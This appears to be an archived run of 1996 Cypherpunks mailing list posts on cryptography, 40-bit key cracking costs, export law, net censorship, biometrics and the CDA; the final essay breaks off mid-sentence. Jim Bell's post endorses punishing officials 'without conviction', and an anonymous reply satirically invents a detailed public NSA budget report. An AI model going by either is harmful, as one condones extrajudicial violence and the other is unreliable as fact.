To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: e$ Signorage
In-Reply-To: <199604080206.WAA29767@jekyll.piermont.com>
Message-ID: <Pine.SV4.3.91.960408195750.12112A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


The Board of Governors of the Federal Reserve Bank is a government agency.
Everyone else in the Fed - really the various regional Feds - are not
government employees. Perry explicitly mentions that there are overhead
expenses that detract from the profit - videlicet, the US Treasury doesn't
pay the operating expenses of the Fed. Therefor, the profits do not go to
the US TReasury. Certainly, the Board is in total control of the picture.
And the Treasury doesn't need the profits. HEck, somewhere around here,
I've got a quote of a Fed Regional President from the 1940's, in which he
says that the govt doesn't need revenues beyond the current interest
payable. TEchnically correct, but politically incorrect. Although, some of
us may live to see such a scenario.  It's happened to lots of countries,
and the sky didn't fall down. People just got sloshed downward on the
real-income-in-constant-dollars scale, via the mechanism of inflation.
This is not a Conspiracy Theory (tm), this is history. 

We've already experienced a massive loss of affluence in this country 
since October 1973, and it didn't cause a revolution. That's why people 
like Greenspan make the big bucks.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Apr 1996 14:25:46 +0800
To: nyap@mailhub.garban.com (Noel Yap)
Subject: Re: RC4 improvement idea
In-Reply-To: <9604082133.AA15440@mailhub.garban.com>
Message-ID: <199604090017.UAA28573@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Noel Yap writes:
> The S-Boxes in DES were optimized to hinder Differential
> Cryptanalysis.  I've seen no studies on the effectiveness of
> jumbling the S-Boxes during encryption -- even Biham and Shamir's
> book doesn't mention it -- but, I figure, if it helps, DES would
> probably already be doing it (unless of course the NSA thought the
> jumbling would make too good an algorithm).

Your conclusion may be correct, but your reasoning is faulty. DES was
built to be run in hardware, which doesn't make S-Box jumbling easy;
it was in fact built to be run on the hardware of twenty years ago,
which was far more constrained than our hardware is now.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Tue, 9 Apr 1996 13:35:58 +0800
To: "Frank O. Trotter, III" <fotiii@crl.com>
Subject: Re: the cost of untracability?
In-Reply-To: <199604080217.AA24295@mail.crl.com>
Message-ID: <Pine.SV4.3.91.960408201825.12112B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Gold is still loaned out between producers. For whatever reason, the 
money gained in the transaction is called "rent", not "interest".

Some time ago, the Bank of Portugal took a big loss when it loaned out 
gold - and the borrower defaulted. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Apr 1996 13:18:49 +0800
To: "JR Weaver" <weaver@harry.bwi.wec.com>
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604081642.ZM1632@harry.bwi.wec.com>
Message-ID: <199604090025.UAA28599@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"JR Weaver" writes:
> Is it really that easy to break 40-bit? Don't you need access to a
> "fair amount of cpu power" to brute force crack 40bit?

The rest of this article is a direct quotation from Blaze et al in the
paper they wrote on minimal safe key lengths. Note that they show that
it is easy enough to make a cracker that costs eight cents (CENTS!)
per solution, and not that hard to get it down to 1/10th of a cent!

Full paper at:
ftp://ftp.research.att.com/dist/mab/keylength.txt

}    There is no need to have the resources of an institution of higher
}education at hand, however.  Anyone with a modicum of computer
}expertise and a few hundred dollars would be able to attack 40-bit
}encryption much faster.  An FPGA chip --- costing approximately $400
}mounted on a card --- would on average recover a 40-bit key in five
}hours.  Assuming the FPGA lasts three years and is used continuously
}to find keys, the average cost per key is eight cents.
}
}    A more determined commercial predator, prepared to spend $10,000
}for a set-up with 25 ORCA chips, can find 40-bit keys in an average of
}12 minutes, at the same average eight cent cost.  Spending more money
}to buy more chips reduces the time accordingly:  $300,000 results in
}a solution in an average of 24 seconds; $10,000,000 results in an
}average solution in 0.7 seconds.
}
}    As already noted, a corporation with substantial resources can
}design and commission custom chips that are much faster.  By doing
}this, a company spending $300,000 could find the right 40-bit key in
}an average of 0.18 seconds at 1/10th of a cent per solution; a larger
}company or government agency willing to spend $10,000,000 could find
}the right key on average in 0.005 seconds (again at 1/10th of a cent
}per solution).  (Note that the cost per solution remains constant
}because we have conservatively assumed constant costs for chip
}acquisition --- in fact increasing the quantities purchased of a
}custom chip reduces the average chip cost as the initial design and
}set-up costs are spread over a greater number of chips.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Apr 1996 17:56:15 +0800
To: "Declan B. McCullagh" <mpd@netcom.com (Mike Duvos)
Subject: Re: Australia's New South Wales tries net-censorship
Message-ID: <m0u6V7Z-0008yYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:40 PM 4/8/96 -0400, Declan B. McCullagh wrote:
>Excerpts from internet.cypherpunks: 8-Apr-96 Re: Australia's New South
>W.. by Mike Duvos@netcom.com 
>> I'd be interested to know if the courts have ever had a case in
>> which a person has been declared to have been in "possession" of
>> illegal material merely by virtue of its momentary presence in
>> their cache, screen buffer, or usenet spool.
>>  
>> There is a case now involving the University of Pittsburgh in
>> which the Feds are attempting to prove that an individual was in
>> possession of certain child porn images on his own PC during a
>> brief span of time in 1993.
>
>For it to be a crime, I would presume that the courts would require
>"guilty knowledge" of the act. (At least I hope they would!)

But what is "guilty knowledge"?  Let's suppose I'm web-browsing, and I come 
across something I shouldn't.  If I'm aware of caching, I _know_ that the 
stuff is in my memory or HD or somewhere, and I _know_ it's illegal.  Does 
that constitute "guilty knowledge"?

What if a person is unaware of this caching?  Does he lack the same guilty 
knowledge?

See, this is the problem with the "guilty knowledge" idea:  It really isn't 
knowledge which should be illegal, intent is vital.  Part of the reason 
"our" system is so screwed up is that police can misrepresent our actions in 
this way.

I have an easy solution for this:  _NO_ information should be illegal.  None.

Jim Bell
jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 9 Apr 1996 18:16:08 +0800
To: cypherpunks@toad.com
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u6Vu2-0008xuC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:23 PM 4/8/96 -0800, david friedman wrote:

>Have you read _The Hacker Crackdown_? I think it is pretty clear that part
>of what was going on there involved law enforcement people deliberately
>punishing BBS operators for behavior that was wicked but not
>illegal--basically facilitating communications involved in committing
>crimes (credit card number theft and the like). The punishment consisted of
>seizing the computer and backups and holding it for a year or so as
>"evidence"--without ever filing charges.
>
>Conceivably the owner could have taken legal action--but doing so would
>give the law enforcement people an incentive to file charges, thus imposing
>large costs on the owner even if he was innocent of any crime and could
>eventually prove it.
>
>I suspect that a good deal of this goes on in most law enforcement systems,
>in one form or another. Charging and convicting people is costly, even if
>they are guilty--and there is often behavior that law enforcement people
>want to prevent that is not even illegal. On the other hand, there are lots
>of things police can do that impose sizable costs but do not require a
>conviction, such as arresting you, holding you in a cell overnight, but
>never actually trying you for anything.
>David Friedman
>School of Law
>Santa Clara University

This is yet another one of the many reasons I advocate a system, AP,  that 
some people around here call "extremely radical."  (By today's standards it 
_is_ "extremely radical," but only in the sense that many sheeple seem ready 
to continue to tolerate the status quo.)

I assert that if there is a mechanism in existence over the medium to long 
term to allow officialdom to punish people without conviction for things 
that are not even crimes, then I see nothing wrong with setting up a 
different system to punish these _officials_, without conviction, for things 
that THEY would claim are not crimes.  If those officials wish to avoid this 
punishment, they should resign or even better, use their powers to 
immediately eliminate that unfair and unjustified punishment for ordinary 
citizens.

But I guess this solution is a bit too obvious for some, huh?  B^)

Maybe we should call it "Contempt of Citizenry."

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 9 Apr 1996 14:23:24 +0800
To: cypherpunks@toad.com
Subject: Re: NSA Budget
In-Reply-To: <19960408.181433.15302.0.zalchgar@juno.com>
Message-ID: <199604090129.VAA28654@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



zalchgar writes:
> Is there a public release of the NSA's annual Budget.

No.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Tue, 9 Apr 1996 14:11:45 +0800
To: cypherpunks@toad.com
Subject: questions about bits and bytes
Message-ID: <3169BE82.274@iconn.net>
MIME-Version: 1.0
Content-Type: text/plain


This may be a bit of a no brainer, but everything I have read sorta 
skips over this point.

a bit is 1 or 0
8 bits make up a byte (0-255)
If I have a 5 byte key, does that make it a 40 bit key?  The only
reason this doesn't make sense to me is it seems useless to use 5 byte
keys, yet that is what companies export since the government limits keys
to 40 bits.
-- 
thecrow@iconn.net
"It can't rain all the time"

RSA ENCRYPTION IN 3 LINES OF PERL
---------------------------------------------------------
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Apr 1996 15:44:39 +0800
To: cypherpunks@toad.com
Subject: International Net-Censorship Efforts Update
Message-ID: <8lOQ_Jy00YUvN==nMc@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


I've just doubled the number of international net-censorship efforts
that I track on my web page: <http://www.cs.cmu.edu/~declan/zambia/>.

Included are new updates reporting on Germany, France, Australia,
Singapore, Canada, and China, among others. Please send me reports on
countries I've missed!

-Declan

--------------------------------------------------------------------------

   
                    OTHER INTERNATIONAL NET-CENSOR EFFORTS 

                              By Declan McCullagh
                                declan@well.com
                     http://www.cs.cmu.edu/~declan/zambia/   
   

     France, China, Germany, Singapore, Jordan, the U.S., and many other
     countries are moving towards tighter control of the Internet. France
     and Germany want to see an international agreement of information
     controls emerge. Recently China required all of its estimated 40,000
     Internet users to register at the local police station. This
     international crackdown marks a turning point in the development of
     the Net.

     
  Germany
  
     Germany cuts off access to holocaust revisionist web site (1/96)
     German Internet update, new laws planned (3/29/96)
     Los Angeles Times on German vs. U.S. netcensorship (3/13/96)
     German minister predicts collapse of governments (3/12/96)
     Germany's CompuServe net-censorship (12/31/95)
     
  France
  
     French government bans controversial book (1/96)
     French Jewish students sue ISPs for revisionist materials (3/14/96)
     French Jewish students sue ISPs for revisionist materials (3/15/96)
     France calls for "global Internet rules" (2/3/96)
     
  Europe
  
     Swiss statement on voice over Internet (3/16/96)
     Sweden proposes CDA-type law to control Internet (4/3/96)
     Italian net-censorship necessary, says Simon Wiesenthal Ctr (1/11/96)
     Turkey cracks down on Internet (2/18/96)
     Belgium bans non-escrowed encryption (1/10/96)
     
  Asia and Pacific Rim
  
     Singapore leader condemns Net (3/7/96)
     Indonesia attacks Net (3/11/96)
     Malaysia complains about uncensored Net, censors it (3/11/96)
     Singapore censors political, religious net.info (3/6/96)
     
  China
  
     China cracks down on Internet, "state security" cited (1/24/96)
     China's anti-cyberporn efforts (2/4/96)
     New York Times on China's net.crackdown (2/5/96)
     China's history of Net-regulation, cyberporn concerns (1/1/96)
     China requires Internet users to register with police (2/16/96)
     U.S. State Dept criticizes China's net.censorship (3/8/96)
     China applauds German net.censorship (1/11/96)
     
  Australia
  
     Australia considers net.legislation (2/13/96)
     New South Wales tries net-censorship (4/3/96)
     Australians upset by German Zundelcensorship (4/7/96)
     
  Canada
  
     Letter to Canadian minister (3/19/96)
     Canada needs to regulate Net, says Simon Wiesenthal Ctr (2/20/96)
     
  Middle East
  
     Persian Gulf States reluctant to move online (4/6/96)
     Jordan installs Internet screening facility (1/8/96)
     Saudi Arabian government says no unrestricted Net access (1/10/96)

--------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Apr 1996 20:54:02 +0800
To: cypherpunks@toad.com
Subject: English translation of "Le Grand Secret" complete!
In-Reply-To: <klOQHoO00YUvJ==pJO@andrew.cmu.edu>
Message-ID: <clOQJL_00YUv9BgF5g@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The English translation of the banned book "Le Grand Secret" is complete!

If your French is a little rusty, and you're curious about the book
that caused the French government such headaches, you may want to
check out:
  http://www.cs.cmu.edu/~declan/le-secret/

A group of volunteers performed this work without compensation. (I
solicited help with the translation by putting a note on my web pages.)
A German translation is now in progress, and I expect to have the text
online by this summer.

-Declan

   ------------------------------   

   THE BIG SECRET                                    
   By Dr. Claude Gubler
   http://www.cs.cmu.edu/~declan/le-secret/
   
Chapters and translators:

     * Chapter 1
     * Chapter 2
     * Chapter 3 (Michel Eytan)
     * Chapter 4 (Francoise R. Corey)
     * Chapter 5 (Jennifer FitzGerald)
     * Chapter 6 (Jonathan Wallace)
     * Chapter 7
     * Chapter 8 (E. Dean Detrich)
     * Chapter 9 (Kris Shapar)
     * Chapter 10 (Jean-Michel Prima)
     * Chapter 11
     * Chapter 12
     * Chapter 13 (Andrea Crain)
       
     Because of the sensitive political nature of this work, not everyone
     who helped translate Le Grand Secret into English wished to be
     listed here. Above are the names of those who chose to be
     identified. However, everyone who volunteered deserves thanks for
     donating their time and making this important work available to a
     wider audience.
     
     Andrea Crain, in particular, has spent endless hours coordinating
     this effort and ensuring the high quality of the final translation.
     Thanks, Andrea, for all your work.
     
     -Declan McCullagh, April 7, 1996
     
   ------------------------------ 
   







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 9 Apr 1996 22:03:36 +0800
To: David Loysen <dwl@hnc.com>
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't Work
In-Reply-To: <199604081810.LAA22544@spike.hnc.com>
Message-ID: <Pine.BSF.3.91.960408222428.8748B-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is my credit card going to have my face digitized and encoded onto the mag
> stipe for comparision with a video camera image at the time of sale? 

I think we all know how stupid that would be... Way too easy for someone 
to put their own face on a card. For it to be effective, there would have 
to be some central Big Brotherly computer with all the faces stored 
there. Mind you, from that British study, it seems that fudging the face 
isn't really necessary. :-/

I recall, some months ago there were plans to have a fingerprinting system
at the Canada/US border and people could get accross faster if they had a
card with their fingerprint stored on it. Even the news media was able to
figure out how easy it would be to fudge it. The main idea of having the
fingerprints on the card, though, was to avoid that Big Brotherly 
computer. I don't know whatever happened to that plan.

(((cloaked sig file)))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O. Trotter, III" <fotiii@crl.com>
Date: Tue, 9 Apr 1996 16:48:29 +0800
To: cypherpunks@toad.com
Subject: Re: Bulletin: Cypherpunks say no taxes owed by moneychangers!
Message-ID: <199604090336.AA03230@mail.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


Lets state it simply, if you make a gain by holding a currency then
it must be included in your reported income.  At least one writer
correctly stated that the IRS likely does not care about small
amounts taken on a trip, but they are technically reportable.

Same goes for a loss, it is a deduction (with string attached of 
course) from taxable income.

Aside from ecash, helping people to exchange currency is my day job
so I see this all the time, especially this month each year.

Best

FOT

Disclaimer: Personal not corporate thoughts....

Frank O. Trotter, III  -   fotiii@crl.com
www.marktwain.com  - Fax: +1 314 569-4906
--------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 9 Apr 1996 19:12:03 +0800
To: David Loysen <cypherpunks@toad.com
Subject: Re: (Fwd) British Study Claims That Photo Credit Cards Don't  Work
Message-ID: <199604090654.XAA16860@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Some thoughts... (er, questions):
> > 1. What are the implications for log-on systems that rely on 
> > recognition of faces (supposedly impossible for hackers to describe 
> > and exploit)?

At 11:19 AM 4/8/96 -0700, David Loysen wrote:
> Does anybody know how well these systems work? 

Yes:  They don't work.

> If I don't shave over the
> weekend will my computer know who I am Monday morning?

Shaving probably will not be a problem, but holding your head at a slightly
different angle, or having slightly different lighting, or combing your
hair differently will screw up the system totally, unless the system has 
radically improved since the last time  I read up on it.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 9 Apr 1996 19:39:18 +0800
To: Jack Mott <cypherpunks@toad.com
Subject: Re: questions about bits and bytes
Message-ID: <199604090654.XAA16867@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 4/8/96 -0400, Jack Mott wrote:
> a bit is 1 or 0
> 8 bits make up a byte (0-255)
> If I have a 5 byte key, does that make it a 40 bit key? 

Yes.  

> The only
> reason this doesn't make sense to me is it seems useless to use 5 byte
> keys, yet that is what companies export since the government limits keys
> to 40 bits.

Yes, a 40 bit key is useless.  What is it that does not make sense to you?
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 9 Apr 1996 18:19:59 +0800
To: cypherpunks.toad.com@miron.vip.best.com
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <199604081656.MAA00598@miron.vip.best.com>
Message-ID: <Pine.BSF.3.91.960408224407.8748C-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> In the absence of cryptanalysis, the output of a symetric cipher
> looks like random bytes.
> Every one should have a hardware RNG on their computer.
> "I am sorry your honor, that is a file of random numbers that I
> was using to check the output of my RNG."
> Or
> "I am sorry your honor that is a one-time pad I was planning
> to use."

But, would the average jury understand what a RNG is? The prosecution
would probably argue that "It's a tool used by terrorists and child
pornographers so that they can create 'codes' to communicate with each
other". If they say that, they could probably even supress any
explaination of what a RNG actually is, by claiming that it's "to
dangerous to allow into public record". The Phrack E911 document was
supressed in that way. 

In some countries I could see people being charged with an offence just
for having a RNG... The output looks encrypted, and I heard that in France
(and other countries) it is illegal to create anything that even *looks*
encrypted. :(

Disclaimer: IANAL




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Tue, 9 Apr 1996 20:05:56 +0800
To: JR Weaver <weaver@harry.bwi.wec.com>
Subject: Re: Bank transactions on Internet
In-Reply-To: <9604081642.ZM1632@harry.bwi.wec.com>
Message-ID: <Pine.BSF.3.91.960408235041.8873A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Is it really that easy to break 40-bit? Don't you need access to a "fair
> amount of cpu power" to brute force crack 40bit? 

I remember reading a recent paper at this URL:
  http://theory.lcs.mit.edu/~rivest/bsa-final-report.ascii
They mentioned a Field Programmable Gate Array (FPGA), specifically a
board-mounted AT&T Orca chip available for around $400. They said it could
crack a 40-bit key in 5 hours (average). Sounds like anyone with root
access on a major internet node could make a significant profit stealing
credit card numbers.

The FPGA sounds like a very interesting device, with quite a few
legitimate uses... Has anyone out there seen one of these? 

(((cloaked sig file)))




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org (Carl Ellison)
Date: Tue, 9 Apr 1996 22:12:39 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Disclosure of Public Knowledge to Foreigners
Message-ID: <v02140b0fad8f98cb0085@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 4/3/96, Timothy C. May wrote:

>There is a reasonable chance the Supreme Court would see the overall
>absurdity of a situation where the knowledge is freely available to 200
>million adult Americans, with no restrictions whatsover on publication,
>discussion, etc., and yet uttering this knowledge in front of a foreigner
>is a crime.
>
>I don't think this would pass Constitutional muster, as the lawyers like
>to say.
>
>(The British at least have an Official Secrets Act. Much as I dislike that
>Act, at least they are more consistent in the sense of classifying things
>as being secret. How can the U.S. argue that knowledge available in any
>large library or bookstore to anyone who wants it, citizen or not, may not
>be "disclosed" to foreigners? If it's common knowledge, it's common
>knowledge!)

This assumes that the purpose of the ITAR restrictions is to keep a secret.
To the extent that the gov't argues that, they have no case as you point
out.

However, the ITAR is there specifically to frustrate US businesses if they
should want to sell or give away crypto overseas.  The rules, despite their
illogic, achieve that goal.

I would like to believe that the Supremes would rule that the Gov't has no
right to use what amounts to a secrecy provision just for harrassment --
but they might not.

I had Mike Nelson say to my face, 1.5 years ago, that he knows good crypto
is available to foreigners -- he just wants to make damn sure it doesn't
come in shrink-wrapped packages from US companies.  I can't judge the
constitutionality of that position but it holds together logically.
["don't let American products hurt American interests" the battle cry runs]

 - Carl


+--------------------------------------------------------------------------+
| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
|   "Officer, officer, arrest that man!  He's whistling a dirty song."     |
+---------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 9 Apr 1996 18:11:01 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Australia's New South Wales tries net-censorship
Message-ID: <v02140b01ad8f39982775@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 4/8/96, Mike Duvos wrote:

>I'd be interested to know if the courts have ever had a case in
>which a person has been declared to have been in "possession" of
>illegal material merely by virtue of its momentary presence in
>their cache, screen buffer, or usenet spool.

If you want a real world analogy, there are cases where overeager USPS
Inspectors who want to "get" someone have sent them porno as a Return
Receipt Requested Item and then raided before the person had had a chance
to open the package. That is possession under the Law.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 9 Apr 1996 22:54:50 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Bulletin: Cypherpunks say no taxes owed by moneychangers!
Message-ID: <v02140b05ad8f4000a8a0@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:48 4/8/96, Timothy C. May wrote:

>There are people and companies who make a nice business in currency
>exchange, ranging from the large companies one finds in international
>airline terminals and banks to the smaller, "Mom and Pop" moneychangers one
>finds in barrios and other such places.
>
>These moneychangers attempt to make a "profit" on each exchange (else
>they'd hardly stay in business).

But they make their profit by charging a fee for the transaction not just
by the float in the exchange rates. For example, if the current official
rate is $1=¥125 and you are converting Dollars to Yen, they may only give
you 115 Yen keeping the other ¥10 as a processing fee.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Date: Tue, 9 Apr 1996 16:15:18 +0800
To: cypherpunks@toad.com
Subject: NSA Budget
Message-ID: <199604090146.CAA03627@pangaea.hypereality.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>Is there a public release of the NSA's annual Budget.
>If so is there a quarterly release. -Erinn

-----

   Yes, there are annual and quarterly reports released to the
   public which describe in meticulous detail expenditures for
   the agency's program, personnel and equipment:

   1. The program of services and information supplied to
      government and other intelligence organizations, US and
      foreign, with terms of each client contract.

   2. US employees, their organization, skills, duties and
      longevity of service; their names, ranks, identification
      codes, secure communication methods and home addresses;
      the location of workplaces; the continued training each
      is scheduled to receive; leaves of absence and
      destinations while absent.

   3. Foreign nationals covertly employed worldwide, with
      information on each as per 2.

   4. A comprehensive listing of all types of world-wide
      equipment operated; its detailed design, function and
      output; where it is located; its designers,
      manufacturers and purchase cost; its schedule of
      amortization; and its schedule for replacement and/or
      upgrade, with fifteen-year projected procurement.

   5. Special short- and long-term contracts with governmental
      and non-governmental organizations, US and foreign for
      one-time projects, by goal, personnel and equipment.

   6. Special projects with other US and foreign counter-
      intelligence to issue disinformation about the agency.

   7. Special section on world-wide US and foreign cryptology:
      cryptanalysis, cryptography, steganography, codes,
      cyphers, glyphs, mimes; each ranked for security and
      ease of cracking; governmental and non-governmental
      parties using each; names of cooperative and resistant
      cryptographers and cooperating pseudo-cryptographers.

   8. Sub-section on methods of Internet traffic and language
      analysis; operation and surveillance of anonymous
      remailers, bulletin boards and mail lists; lists of
      cooperative and resistant educational institutions and
      commercial organizations.

   9. Appendices on: black operations; transparent operations;
      methods for managing cooperative and resistant
      governmental and non-governmental persons.

   The public is invited to study and/or download these
   reports anonymously at:

      http://nsa.dod.gov/~reports/quarterly.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Apr 1996 21:31:08 +0800
To: cypherpunks@toad.com
Subject: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <8lOUXbq00YUvBYs3cV@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


The attached paper by Dr. Reed is worth reading -- I haven't seen this
argument raised before. One portion that I found fascinating was:

  "It is quite silly to imagine that the Ascend router at the ISP can
  figure out if it is me or my child generating each packet."

But that's exactly what the defenders of the CDA are claiming! Here's
some background that might be interesting:

When I was arguing with Bruce Taylor (an architect of the CDA) last
week, we went 'round and 'round on the issue of children on the Net, as
usual. He maintained that every Internet user has to have an account
somewhere, so that account provider is able to tag accounts as minor or adult.

To the best of my ability, I pointed out some of the technical problems
with this, and he responded (I paraphrase from memory here) that
technical problems can be solved by technical people: "Your side comes
across to the court as saying that it can be done but we won't do it.
You're a bunch of geeks who want to protect their porn and the court
isn't going to buy it."

He brought up IP Version 6, which the DoJ has focused on in
cross-examination of one of our witnesses, Scott Bradner from the IETF:

    13           Q   Would it be fair to say, to summarize what you've just
    14           said, that the IP Next Generation group is working on a new
    15           generation of the IP Protocol itself?
    16           A   That is correct.
    17           Q   Does it have -- does the IP Next Generation group have
    18           recommendations regarding a specific architecture of the
    19           packet traffic on the Internet, including the format of the
    20           packet?

The DoJ and Taylor are going to argue that IP V6 can include such an
adult/minor tag in each datagram! One of their key witnesses is Dan
Olsen, the head of the computer science department at Brigham Young
University and the incoming director of the Human Computer Interaction
Institute at CMU.

Olsen's background is NOT in distributed computing environments and
protocol design -- but that minor detail notwithstanding, it looks like
he'll be testifying this Friday that such a tagging scheme is
technically possible.

Chris Hansen from the ACLU told me last Friday: "Olsen is going to push
this tagging idea that the government has, that you can imbed in your
tag -- in your address -- an adult or minor tag. They're going to
suggest that the market will come into existence that will make that
tagging relevant."

Comments?

-Declan

---------------------------------------------------------------------------



   
  Enforcing the CDA Improperly May Pervert Internet Architecture
  
   by David P. Reed
   
   Friends -
   
   I'd like to call your attention to a situation where misguided
   politics (of the "ends-justify-means" sort) threatens one of the
   fundamental principles of Internet architecture, in a way that seems
   like a slippery slope. I do not normally take public stands of a
   political nature, and I do not participate much in Internet
   architecture anymore, but I'd like to call your attention to a very
   severe perversion of the Internet architectural philosophy that is
   being carried out in the name of political and commercial expediency.
   No matter what you believe about the issues raised by the
   Communications Decency Act, I expect that you will agree that the
   mechanism to carry out such a discussion or implement a resolution is
   in the agreements and protocols between end users of the network, not
   in the groups that design and deploy the internal routers and
   protocols that they implement. I hope you will join in and make
   suggestions as to the appropriate process to use to discourage the use
   of inappropriate architectural changes to the fundamental routing
   architecture of the net to achieve political policy goals.
   
   As you know, I am one of the authors, along with Saltzer and Clark, of
   the paper "End-to-end arguments in decentralized computer systems",
   which first characterized in writing the primary approach to the
   Internet's architecture since it was conceived, which approach
   arguably has been one of the reasons for its exponential growth. This
   philosophy - avoid building special functionality into the net
   internals solely to enforce an end-to-end policy - has led to the
   simplicity, low cost, and radical scalability of the Internet. One of
   the consequences is that IP routers do not enforce policies on a
   packet-by-packet basis, so routers can be extremely simple beasts,
   compared to the complex beasts that characterize even the simplest
   telephone central office switch. End-to-end policies are implemented
   by intelligence at the ends (today, the PCs and servers that
   communicate over the many consolidated networks that make up the
   Internet).
   
   I just read in Inter@ctive Week (March 25, 1996) that Livingston plans
   to announce an "Exon box" - a router that is designed to enable ISPs
   to restrict access to "indecent sites" or unrated sites unless an
   "adult" enters an authorization code when opening a session to enable
   the router to transmit packets to the site.
   
   The scam seems to be that Livingston has colluded with Senator Exon's
   staff to propose a "solution" to enable ISP's to implement parental
   controls. Exon's staff is using the announced solution as an example
   to demonstrate how simply ISPs can enforce local community standards
   and parental controls, thus supporting interpretations of the CDA
   requiring all access providers to include such capability in their
   boxes. Exon's staff is quoted as encouraging ISP's to install such
   functionality into the routers that serve as access points for nets.
   
   Since I use an Ascend P50 ISDN router to make frequent, short,
   bandwidth-on-demand ISDN connections from my "Family LAN" to an Ascend
   multi-line ISDN router at my commercial Internet Service Provider, I
   am worried that this model is completely unworkable for me, and for
   others that will eventually use such a practical system. My family has
   minor children and adults who all happily access the Internet. My ISP
   has no clue whatsoever whether a child or adult has initiated the
   call, and in fact, if my child and I are both on different computers
   in different rooms, it is quite silly to imagine that the Ascend
   router at the ISP can figure out if it is me or my child generating
   each packet.
   
   It is appalling to me that Livingston, which has some responsibility
   as a router provider to assist in the orderly growth of the net, is
   pandering to Exon's complete misunderstanding of how the Internet is
